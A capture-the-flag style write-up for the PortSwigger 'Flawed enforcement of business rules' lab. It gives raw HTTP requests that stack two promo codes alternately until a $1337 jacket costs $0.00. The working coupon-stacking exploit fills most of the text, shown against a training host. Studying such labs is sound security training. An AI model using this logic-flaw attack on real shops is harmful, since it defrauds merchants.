Skip to content

Port Swigger Flawed enforcement of business rules

Flawed enforcement of business rules

Solution

Get promo codes from website

Get promo code on the website
New customers use code at checkout: NEWCUST5
---
Get second promo code on the website
Use coupon SIGNUP30 at checkout!
---
POST /sign-up HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=eYDAlHzOsD9pRmH42AS8Pv2SvzN441kL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gqUXya8cZimDTZECpvSVEAHVuLJa44Id&email%2F=pentest%40localhost.pl
---
GET /?sign-up-confirmed=true HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=eYDAlHzOsD9pRmH42AS8Pv2SvzN441kL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Login to website, user: wiener

POST /login HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=eYDAlHzOsD9pRmH42AS8Pv2SvzN441kL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=gqUXya8cZimDTZECpvSVEAHVuLJa44Id&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Add product to bucket

POST /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

productId=1&redir=PRODUCT&quantity=1
---
GET /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Add coupons to reduce price and buy

Adding coupons alternately
NEWCUST5
SIGNUP30
---
POST /cart/coupon HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=lbcDzs2p96MrMe7i7lZUlVjxJGrmqCHd&coupon=SIGNUP30
---
GET /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /cart/coupon HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=lbcDzs2p96MrMe7i7lZUlVjxJGrmqCHd&coupon=NEWCUST5
---
GET /cart HTTP/2
Host: 0ace0094037b815580c93f5100f600a9.web-security-academy.net
Cookie: session=nK9z5r73MtZOl3299vg7hx0KjnrYmAuX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ace0094037b815580c93f5100f600a9.web-security-academy.net/cart
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

---
Response
Name    Price   Quantity    
Lightweight "l33t" Leather Jacket   $1337.00    1   
SIGNUP30    -$401.10        
NEWCUST5    -$5.00      
SIGNUP30    -$401.10        
NEWCUST5    -$5.00      
SIGNUP30    -$401.10        
NEWCUST5    -$5.00      
SIGNUP30    -$401.10        
Total:  $0.00

Solved